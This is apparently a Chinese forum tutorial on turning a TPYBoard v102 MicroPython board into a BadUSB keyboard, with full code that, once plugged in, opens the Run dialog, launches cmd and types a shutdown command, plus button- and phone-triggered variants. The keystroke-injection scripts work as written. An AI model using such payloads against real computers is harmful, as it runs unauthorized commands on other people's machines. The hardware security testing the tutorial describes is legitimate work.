|
本文以TPYBoardv102开发板为例讲解了利用micropython进行BadUSB的usb-HID设备测试的主要方法,使用mt7681模块进行了一个简单的实验,实现了手机摇控键盘输入的测试。 最近从 网上搞了一块tpyboard V102(官网www.micropython.net.cn)进行了一下研究,特别是对其自身的USB-HID功能进行了测试,令人惊喜的是,你可以在仅懂python的情况下,进行HID攻击的姿态测试。具体TPYBoardv102的使用方法,请参见www.micropython.net.cn。 TPYBoardV102模拟键盘 该板子的使用方法入门,本文中略过,有兴趣的可以查看其网站http://www.micropython.net.cn/support_category.php?id=2。TPYBoardv102中,在进行键盘模拟时,每次发送了8个字符,只要搞清楚了这8个字符的含义,就能够进行HID模拟了。 键盘发送的8个字符:BYTE1 BYTE2 BYTE3 BYTE4 BYTE5 BYTE6 BYTE7 BYTE8。其中BYTE1用来实现功能键: BYTE1 -- |--bit0: Left Control 按下时为1 |--bit1: Left Shift按下时为1 |--bit2: Left Alt按下时为1 |--bit3: Left GUI按下时为1 |--bit4: Right Control按下时为1 |--bit5: Right Shift按下时为1 |--bit6: Right Alt按下时为1 |--bit7: Right GUI按下时为1 BYTE3到BYTE8是具体按键(见0x06附件),如: 按下left shift + a ,则发送 0x02,0x00,0x04,0x00,0x00,0x00,0x00,0x00。 这里以按下left GUI+R来具体讲解实现过程。 第一步:修改boot.py文件,代码如下: import machine
import pyb
#pyb.main('main.py') # main script to run after this one
#pyb.usb_mode('CDC+MSC') # act as a serial and a storage device
pyb.usb_mode('CDC+HID',hid=pyb.hid_keyboard)
第二步,修改main.py文件,代码如下: # main.py -- put your code here!
hid=pyb.USB_HID()
def release_key_once():
buf = bytearray(8) # report is 8 bytes long
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
def press_key_once(key):
buf = bytearray(8) # report is 8 bytes long
buf[2] = key
hid.send(buf) # key released
pyb.delay(10)
def press_2key(key1,key2):
buf = bytearray(8) # report is 8 bytes long
buf[0] = key1
buf[2] = key2
hid.send(buf) # key released
pyb.delay(10)
def release_2key():
buf = bytearray(8) # report is 8 bytes long
buf[0] = 0
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
pyb.delay(1000) #开始加入1秒延时
press_2key(0x08,0x15)#具体键值见附录部分
release_2key()
第三步,安全退出TPYBoardv102,然后按一下RST键,可以看到一秒后“运行”窗口弹出。
0x03 简单的HID测试
测试打开“运行”窗口,输入cmd,然后弹出cmd后,输入shutdown -s -t 60 ,即60秒后自动关机。
Main.py的代码如下:
- # main.py -- put your code here!
- hid=pyb.USB_HID()
- def release_key_once():
- buf = bytearray(8) # report is 8 bytes long
- buf[2] = 0
- hid.send(buf) # key released
- pyb.delay(10)
- def press_key_once(key):
- buf = bytearray(8) # report is 8 bytes long
- buf[2] = key
- hid.send(buf) # key released
- pyb.delay(10)
- def press_2key(key1,key2):
- buf = bytearray(8) # report is 8 bytes long
- buf[0] = key1
- buf[2] = key2
- hid.send(buf) # key released
- pyb.delay(10)
- def release_2key():
- buf = bytearray(8) # report is 8 bytes long
- buf[0] = 0
- buf[2] = 0
- hid.send(buf) # key released
- pyb.delay(10)
- pyb.delay(1000) #开始加入1秒延时
- press_2key(0x08,0x15)#具体键值见附录部分
- release_2key()
- pyb.delay(100)
- a=[0x06,0x10,0x07,0x28] #cmd+enter
- for i in a:
- press_key_once(i)
- release_key_once()
- pyb.delay(1000)
- #shutdown -s -t 60 + enter
- a=[0x16,0x0b,0x18,0x17,0x07,0x12,0x1a,0x11,0x2c,0x2d,0x16,0x2c,0x2d,0x17,0x2c,0x23,0x27,0x28]
- for i in a:
- press_key_once(i)
- release_key_once()
- pyb.delay(1000)
程序运行的效果是:当开发板插入电脑后,会首先弹出“运行”窗口,然后在该窗口里输入cmd,此时弹出cmd,并在其中输入shutdown -s -t 60和回车,然后电脑在1分钟后关机。 DIY一键关机 TPYBoardv102带着一个usr按键,可以利用这个按键来制作一键关机功能。当板子程序运行后,按下usr按键,产生中断,led3闪一下,进行关机操作。具体代码如下: # main.py -- put your code here!
import pyb
FLAG=0 #flag标记,当为1时,关机
def release_key_once():
buf = bytearray(8) # report is 8 bytes long
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
def press_key_once(key):
buf = bytearray(8) # report is 8 bytes long
buf[2] = key
hid.send(buf) # key released
pyb.delay(10)
def press_2key(key1,key2):
buf = bytearray(8) # report is 8 bytes long
buf[0] = key1
buf[2] = key2
hid.send(buf) # key released
pyb.delay(10)
def release_2key():
buf = bytearray(8) # report is 8 bytes long
buf[0] = 0
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
def shutdownpc():
global FLAG
pyb.LED(3).on()
FLAG=1
pyb.delay(300)
pyb.LED(3).off()
hid=pyb.USB_HID()
sw=pyb.Switch()
sw.callback(shutdownpc)
while(1): #led2闪烁表示板子已经正常工作
pyb.LED(2).toggle()
pyb.delay(300)
print(FLAG)
if FLAG==1:
pyb.delay(1000) #开始加入1秒延时
press_2key(0x08,0x15)#具体键值见附录部分
release_2key()
pyb.delay(100)
a=[0x06,0x10,0x07,0x28] #cmd+enter
for i in a:
press_key_once(i)
release_key_once()
pyb.delay(1000)
#shutdown -s -t 60 + enter
a=[0x16,0x0b,0x18,0x17,0x07,0x12,0x1a,0x11,0x2c,0x2d,0x16,0x2c,0x2d,0x17,0x2c,0x23,0x27,0x28]
for i in a:
press_key_once(i)
release_key_once()
pyb.delay(1000)
FLAG=0
用手机摇控键盘输入 这个实验中,我使用了MT7681wifi模块,该模块可以直接进行串口透传。将MT7681与TPYBoardv102进行连接,接线示意图,见下图。这里用的是TPYBoardv102的UART3,串口波特率115200。具体代码如下: # main.py -- put your code here!
import pyb
FLAG=0
def release_key_once():
buf = bytearray(8) # report is 8 bytes long
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
def press_key_once(key):
buf = bytearray(8) # report is 8 bytes long
buf[2] = key
hid.send(buf) # key released
pyb.delay(10)
def press_2key(key1,key2):
buf = bytearray(8) # report is 8 bytes long
buf[0] = key1
buf[2] = key2
hid.send(buf) # key released
pyb.delay(10)
def release_2key():
buf = bytearray(8) # report is 8 bytes long
buf[0] = 0
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
def shutdownpc():
global FLAG
pyb.LED(3).on()
FLAG=1
pyb.delay(1000)
pyb.LED(3).off()
def getchars():
global FLAG
pyb.LED(3).on()
FLAG=2
pyb.delay(1000)
pyb.LED(3).off()
hid=pyb.USB_HID()
sw=pyb.Switch()
sw.callback(shutdownpc)
u1=pyb.UART(3,115200)
u1.init(115200, bits=8, parity=None, stop=1)
u1.write('Hello world!')
buf=''
#print(buf)
while(1): #led2闪烁表示板子已经正常工作
buf=u1.readline()
print(buf)
if buf==b's':
getchars()
pyb.LED(2).toggle()
pyb.delay(1300)
print(FLAG)
if FLAG==1:
pyb.delay(1000) #开始加入1秒延时
press_2key(0x08,0x15)#具体键值见附录部分
release_2key()
pyb.delay(100)
a=[0x06,0x10,0x07,0x28] #cmd+enter
for i in a:
press_key_once(i)
release_key_once()
pyb.delay(1000)
#shutdown -s -t 60 + enter
a=[0x16,0x0b,0x18,0x17,0x07,0x12,0x1a,0x11,0x2c,0x2d,0x16,0x2c,0x2d,0x17,0x2c,0x23,0x27,0x28]
for i in a:
press_key_once(i)
release_key_once()
pyb.delay(1000)
FLAG=0
if FLAG==2:
pyb.delay(1000) #开始加入1秒延时
press_2key(0x08,0x15)#具体键值见附录部分
release_2key()
pyb.delay(100)
a=[0x11,0x12,0x17,0x08,0x13,0x04,0x07,0x28] #notepad+enter
for i in a:
press_key_once(i)
release_key_once()
pyb.delay(1000)
FLAG=0
到这一步,可以看到,手机就像一个摇控键盘一样,可以直接来控制键盘了。只需要在程序中再丰富一下,就可以做个很不错的手机键盘出来。同时,因为可以通过串口返回数据,所以可以在电脑端写个上位机,这样就可以把电脑操作的返回值返回回来。具体的扩展功能大家自己想吧,就只说到这里了。 视频演示: 附件 micropython的主要键值如下:
|
STMCU
2527 人阅读
|
0 人回复
|
2018-04-03
/3 
